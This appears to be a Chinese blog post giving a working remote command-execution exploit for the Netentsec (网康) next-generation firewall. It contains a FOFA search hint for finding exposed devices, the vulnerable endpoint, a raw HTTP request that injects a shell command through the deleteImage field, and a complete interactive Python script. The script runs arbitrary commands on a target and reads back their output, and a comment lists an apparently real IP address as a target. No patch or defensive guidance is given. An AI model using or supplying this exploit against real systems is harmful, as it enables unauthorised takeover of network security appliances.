网康下一代防火墙命令执行

发表于 | 分类于 | | 阅读次数: | 本文总阅读数
字数统计: 496 | 阅读时长 ≈ 2

网康下一代防火墙 命令执行

网康下一代防火墙 命令执行
fofo搜索
在这里插入图片描述漏洞路径

1
/directdata/direct/router

漏洞数据包

1
2
3
4
5
6
7
8
9
10
11
POST /directdata/direct/router HTTP/1.1
Host: 192.168.1.86
Connection: close
Content-Length: 160
Upgrade-Insecure-Requests: 1

{
   
   "action":"SSLVPN_Resource","method":"deleteImage","data":[{
   
   "data":["/var/www/html/d.txt;id >/var/www/html/test.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}

python脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
# -*- coding -*-
#网康下一代防火墙 命令执行
#https://183.203.214.146
import requests
requests.packages.urllib3.disable_warnings()
import sys,colorama
from colorama import *
init(autoreset=True)

def title():
    print(colorama.Fore.GREEN + '+-------------------------------------------------------------+')
    print(colorama.Fore.GREEN +'+      网康下一代防火墙 命令执行 + RCE                +')
    print(colorama.Fore.GREEN +'+-------------------------------------------------------------+')
    print(colorama.Fore.GREEN +'+ EXP: python3 wangkangFirewall.py https://1.1.1.1:8443          +')
    print(colorama.Fore.GREEN +'+-------------------------------------------------------------+')
    print(colorama.Fore.GREEN +'+ 请输入url-格式为:https://xx.xx.xx.xx                           +')

def cmd(urllist,cmdsr):
    url = urllist+'/directdata/direct/router'
    data = {"action": "SSLVPN_Resource", "data": [{"data": ["/var/www/html/d.txt;%s >/var/www/html/test.txt" % cmdsr]}], "f8839p7rqtj": "=", "method": "deleteImage", "tid": 17, "type": "rpc"}
    cmdlist = requests.post(url=url,json=data,verify=False)
    urlshow = urllist+'/test.txt'
    cmdshow = requests.get(url=urlshow,verify=False)
    cmdshowlist =  cmdshow.text
    if len(cmdshowlist) == 0:
        print(colorama.Fore.YELLOW  +'未读取到信息,请检查命令是否输入正确')
    print('------------------------------执行结果----------------------------------\n')
    print(colorama.Fore.RED +'{} '.format(cmdshow.text))
    print('------------------------------------------------------------------------\n')
    print(colorama.Fore.GREEN +'+ 输入下条需要执行的命令--退出输入Q:                           +')
    jhlist = input('')
    if jhlist == 'Q':
        pass
    else:
        cmd(urllist,jhlist)

if __name__ == '__main__':
    #print('------------------------------------------------------------------------\n')
    title()
    url = input('    ')
    print(colorama.Fore.YELLOW  +'------------------------------------------------------------------------\n')
    print(colorama.Fore.GREEN +'+ 输入需要执行的命令                          +')
    cmds = input('')
    print(colorama.Fore.YELLOW  +'------------------------------------------------------------------------\n')
    cmd(url,cmds)

在这里插入图片描述

您的支持将鼓励我继续创作!